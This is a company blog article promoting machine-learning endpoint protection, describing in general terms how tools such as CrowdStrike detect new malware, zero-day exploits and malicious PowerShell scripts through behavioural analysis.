Business Automatica
Processes & SecuritySecurityCloud

AI protects against malware

AI ensures that you are always protected against ever-changing online threats. Here, we show you how it works.

December 5, 2023
5 min read
AI dynamically repels threats

For readers in a hurry

  • Modern endpoint protection uses machine learning to detect suspicious behavioral patterns that indicate misuse or malware.
  • This dynamic protection against novel threats complements static protection, which identifies malware based on its known fingerprints (signatures).
  • Machine learning is also used to continuously monitor user behavior, identify attacks based on that behavior, and subsequently remediate their causes and effects.
  • Effective endpoint protection requires self-adapting software that reliably identifies novel threats and initiates appropriate measures.

A tip for trying it out

If you want a great introduction to the topic of Large Language Models (LLMs)—which are used, among other things, to analyze malware in PowerShell scripts—you should watch this one-hour video by Andrej Karpathy. It covers almost every aspect of Generative AI and LLMs and illustrates them with concrete examples. The topic of security is also covered. A "must-read" for every tech-savvy AI enthusiast.

The dynamics of ML

Classic virus scanners and malware detection programs work with so-called signature detection: the virus scanner attempts to match known sequences of bytes to a virus in order to subsequently isolate the infected file.

However, this has the disadvantage that the malware must already be known to the scanner. Furthermore, resourceful malware developers can easily modify the signature time and again so that the scanner fails—a game of cat and mouse.

Modern endpoint protection therefore relies on AI mechanisms, specifically machine learning, where the security software observes all program processes and automatically derives patterns from them to detect anomalies. Such anomalies can include:

  • Suspicious Wi-Fi access points
  • New user accounts with high privilege levels
  • Attempts to lower security levels on the PC
  • Data exfiltration attempts to malicious IP addresses
  • Suspicious patterns in network traffic

"Behavioral ML"—also known as UEBA (User and Entity Behavior Analytics)—moves in the same direction by focusing increasingly on user behavior, e.g., does a user suddenly try to open files they do not have access to?

If such suspicious behavior is detected, the security software triggers an alert.

The protective hand

If a threat or even an attack occurs, machine learning is also utilized. For example, leading endpoint protection software like CrowdStrike not only attempts to detect malware early but also identifies its root cause and provides suggestions for remediation.

Furthermore, AI algorithms are used to track down modified malware signatures that would otherwise go unnoticed. Even malware without a signature is detected based on its conspicuous behavior—for example, if it attempts to bypass security mechanisms.

To avoid reinventing the wheel, CrowdStrike draws on a multitude of sources, which are combined to further train and refine its own ML models. After all, effective protection against malware is a continuous battle against "evil." Standing still regularly leads to problems and defeat in this "battle."

Example: Zero-day exploit

We want to illustrate how AI works at CrowdStrike using an example. For this, we have chosen the dreaded zero-day exploits. There is no tool for these pests, even once they have been discovered. Only the complete elimination of the vulnerability can solve the problem.

How does CrowdStrike handle this?

  1. A malware author creates new malware and modifies it to bypass signature-based detection. The malware author then publishes the malware on the internet, where their victims encounter it.
  2. Signature-based malware scanners are unable to recognize the new malware because they do not have the malware's signature in their database. However, CrowdStrike's ML models are able to recognize the new malware because they have been trained on a massive dataset of known malware signatures, including signatures that have been modified to bypass conventional signature-based detection.
  3. Furthermore, CrowdStrike's behavioral analysis is able to detect the new malware because it reveals its suspicious behavior, e.g., attempting to access sensitive data or disabling security controls.
  4. Finally, CrowdStrike's threat intelligence can detect the new malware because CrowdStrike collects and analyzes threat data from a variety of sources. CrowdStrike uses this information to update its ML models and detection rules.

In this way, CrowdStrike uses AI/ML in a combination of measures and sources to detect zero-day exploits as reliably as possible—even when they are novel.

Example: PowerShell

PowerShell, which is popular and very powerful on Windows, is also frequently used by hackers to introduce malware into companies. This is where Deep Learning models come into play, analyzing the attacker's source code and detecting it accordingly.

  1. Using Deep Learning models, the most important code segments are automatically extracted from PowerShell scripts.
  2. The AI analyzes the extracted code segments to identify malicious code flows.
  3. The AI compares the code logic with a database of known malicious and benign PowerShell scripts.
  4. If the AI detects malicious code logic, it generates an alert.

Without artificial intelligence, it will be difficult to banish the dangers from the internet. For this reason, an understanding of how the security software used in your own company works is essential.

Those who ask the right questions have a clear advantage.

Interested in our solutions?

Contact us for a free initial consultation.

Get in Touch

Related articles

Pillar article
Featured image for article: Process Automation: The Pragmatic ApproachRecommended
Processes & SecurityLow-CodeERP

Process Automation: The Pragmatic Approach

Process automation doesn't have to be complicated. Learn how to achieve big results with small steps.

June 20, 2024
3 min read
Business Automatica Team
Photorealistic image of a truck scale at a recycling center. A driver in a high-visibility vest stands next to his tipper truck and scans a weatherproof QR code on a sign at the scale house with his smartphone. In the background, roll-off containers, an excavator, and piles of material are visible; above them, a clear sky and a license plate recognition camera on a mast.
topics.industryProcess AutomationWaste Management

Container Services: Fully Digital Weighing Processes

Paper slips, phone calls, and WhatsApp photos slow down the weighbridge. A QR-based web app connects drivers, the yard, and the ERP in a single process.

April 17, 2026
10 min read
Business Automatica Team
Laptop with accounting software and digital icons for automation and digitization
Processes & SecurityDATEVPDF

Automating Accounting

Automating accounting with AI: Save time, reduce errors, and simplify financial processes through intelligent automation.

November 23, 2025
4 min read
Business Automatica Team
Digitalization of invoicing processes and E-Government symbolic image
Processes & SecurityLow-CodeCloud

Digital Dog Tax Registration

Digital dog tax registration as a transferable model for modern, efficient municipal administrative processes.

July 19, 2025
2 min read
Business Automatica Team
Illustration of a man at a laptop with icons for PDF, AI, and spreadsheets – automated PDF processing
Processes & SecurityPDFLow-Code

Automated Extraction of Certificate Data

AI-supported extraction of technical data from PDF certificates – precise, fast, and seamlessly integrated into your ERP systems.

June 2, 2025
4 min read
Business Automatica Team
Automation solutions for increased productivity in the company
Processes & SecurityLow-CodeERP

Automation Solutions - Simple Paths to Increased Productivity

Automation is not rocket science. With the right strategy, companies can save time, avoid errors, and create space for strategic tasks.

December 17, 2024
6 min read
Business Automatica Team